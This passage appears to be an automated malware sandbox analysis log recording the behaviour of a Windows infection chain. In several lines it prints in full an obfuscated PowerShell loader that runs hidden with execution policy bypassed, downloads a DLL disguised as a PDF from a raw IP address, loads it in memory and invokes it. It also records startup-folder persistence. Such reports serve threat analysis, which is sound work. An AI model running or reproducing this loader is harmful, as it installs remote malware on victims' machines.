'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF9F17C17EE push ss; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041D336 push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004184C6 push edi; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004164EE pushfd ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041BDF2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041BDFB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041BDA5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041BE5C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_02BBD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_047BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0321D336 push esp; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0321BE5C push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0321BDA5 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0321BDF2 push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_0321BDFB push eax; ret
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_032164EE pushfd ; iretd
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 23_2_032184C6 push edi; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041D336 push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004184C6 push edi; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004164EE pushfd ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041BDF2 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041BDFB push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041BDA5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0041BE5C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0311D0D1 push ecx; ret
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnkJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnkJump to behavior
          Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
